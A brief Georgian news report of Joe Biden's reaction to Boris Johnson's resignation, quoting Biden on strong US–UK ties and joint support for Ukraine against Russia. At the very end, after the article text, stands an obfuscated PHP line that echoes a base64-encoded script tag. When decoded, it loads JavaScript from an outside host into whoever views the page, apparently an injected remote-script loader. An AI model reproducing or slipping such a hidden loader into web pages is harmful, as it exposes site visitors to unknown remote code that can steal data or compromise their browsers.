celsiusi
ავერსი საქკაბელი

ამერიკის შეერთებული შტატების პრეზიდენტი, ჯო ბაიდენი, დიდი ბრიტანეთის პრემიერმინისტრის ბორის ჯონსონის გადადგომას ეხმაურება და ამბობს, რომ ამერიკას და დიდ ბრიტანეთს შორის განსაკუთრებული ურთიერთობები ისევ რჩება ძლიერი და მტკიცე.

"დიდი ბრიტანეთი და აშშ უახლოესი მეგობრები და მოკავშირეები არიან. ჩვენს ხალხს შორის ურთიერთობები კი ძლიერი და მტკიცე რჩება. მოუთმენლად ველოდები დიდი ბრიტანეთის მთავრობასთან მჭიდრო თანამშრომლობის გაგრძელებას მთელ რიგ მნიშვნელოვან პრიორიტეტებზე, ისევე როგორც მთელ მსოფლიოში ჩვენს მოკავშირეებთან და პარტნიორებთან. ეს მოიცავს ძლიერი და ერთიანი მიდგომის შენარჩუნებას უკრაინის მოსახლეობის მხარდაჭერაში მაშინ, როცა ისინი საკუთარ თავს იცავენ, მათი დემოკრატიის წინააღმდეგ პუტინის სასტიკი ომისგან, ასევე რუსეთისთვის პასუხისმგებლობის დაკისრებაში" - ამბობს ბაიდენი.

შეგახსენებთ, რომ დიდი ბრიტანეთის პრემიერ–მინისტრმა ბორის ჯონსონმა თანამდებობა დათოვა და ამჟამად ის მოველეობის დროებით შემსრულებელია. 

1008
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");